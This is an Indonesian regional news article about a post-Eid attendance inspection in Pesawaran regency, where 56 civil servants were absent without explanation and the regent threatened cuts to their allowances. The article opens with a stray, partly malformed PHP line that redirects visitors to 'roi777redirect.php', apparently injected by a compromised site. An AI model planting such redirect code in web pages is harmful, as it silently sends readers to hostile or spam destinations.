header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Puluhan ASN Pesawaran Mangkir -
Puluhan ASN Pesawaran Mangkir

TRANSLAMPUNG.COM, PESAWARAN – Usai menggelar kegiatan halal bihalal, Bupati Pesawaran Dendi Ramadhona langsung melakukan inspeksi mendadak (Sidak) ke sejumlah kantor di lingkup pemerintah daerah setempat.

Hasilnya cukup mengejutkan. Dari hasil rekapitulasi absensi Aparatur Sipil Negara (ASN) di lingkup pemda setempat dari 1.042 PNS di pemda Pesawaran diketahui tingkat kehadiran PNS mencapai 89,92 persen atau 937 pegawai yang hadir, sisanya tanpa keterangan 56 pegawai atau 5,37 persen.

Untuk itu secara tegas Dendi akan memberikan sanksi kepada ASN yang tetap mangkir pada hari pertama kerja usai cuti bersama lebaran.

“Ya kalau tanpa keterangan tentu kita akan ikuti arahan pemerintah pusat untuk memberikan sanksi berupa pemotongan tukin,” ungkap Dendi saat dikonfirmasi usai sidak Kamis (21/6).

Dikatakan, monitoring tingkat kehadiran tidak hanya dilaksanakan di lingkup pemerintah kabupaten setempat, namun dilakukan hingga tingkat kecamatan. Dimana monitoring langsung dibawah camat selaku pembina PNS di tingkat kecamatan.

“Makanya camat tidak saya undang pada halal bihalal pagi ini, untuk memastikan pegawai ASN ditingkat kecamatan  tetap masuk kerja di hari pertama,” ucapnya.

Kebijakan izin, lanjut putra Anggota Komisi II DPR MPR RI Zulkifli Anwar ini dapat diberikan. Namun tentu itu bersifat ketat yakni bagi ASN yang sakit atau mendapat halangan tertentu.

“Misal ada ASN yang tertimpa musibah itu lain hal. Seperti tadi ada orang tuanya yang meninggal. Yang menjadi target kita yakni pegawai negeri yang tidak hadir tanpa keterangan,” tegasnya. (ozi/ang/tnn)

News Reporter